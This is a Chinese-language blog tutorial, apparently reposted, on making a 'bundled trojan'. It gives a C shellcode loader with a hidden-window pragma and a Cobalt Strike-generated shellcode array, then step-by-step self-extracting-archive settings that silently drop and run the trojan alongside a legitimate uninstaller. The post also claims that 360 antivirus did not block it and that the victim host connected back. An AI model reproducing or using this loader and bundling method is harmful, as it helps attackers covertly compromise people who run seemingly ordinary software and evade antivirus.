这里演示的方式为shellcode框架加载自解压
1.生成shellcode
2.c加载(随便拉的加载器)#include
#include
#pragma comment(linker,”/subsystem:\”windows\” /entry:\”mainCRTStartup\””)
unsigned char shellcode[] =
“\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b”
“\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0”
“\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57”;
void main()
{
((void(*)(void))&shellcode)();
}
3.自解压捆绑exe
当目标运行正常exe的同时会运行我们的木马
复现
使用cobaltstrike生成c的shellcode
将生成的shellcode利用我们自己的加载器加载
使用vc6++打开
编译组建 生成exe
生成的exe文件位于桌面debug文件目录下
接下来使用自解压捆绑exe文件
假设这里捆绑的软件为geek(卸载程序的一个软件)选择我们的木马和要捆绑的软件 选择添加到压缩文件
选择创建自解压格式压缩文件
高级 选择自解压选项
解压路径设置为c盘windows下的temp文件
解压后运行设置选择启动我们的exe和捆绑的软件
模式选择全部隐藏
更新选择解压并更新文件和覆盖所有文件
点击确认生成捆绑马
点击确认 生成捆绑马
这里环境有360 实验360并未作出拦截
双击运行看是否上线
软件正常打开 并且主机成功上线
这个加载器的免杀效果一般 大佬们可以自行替换
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/171433.html原文链接:https://javaforall.cn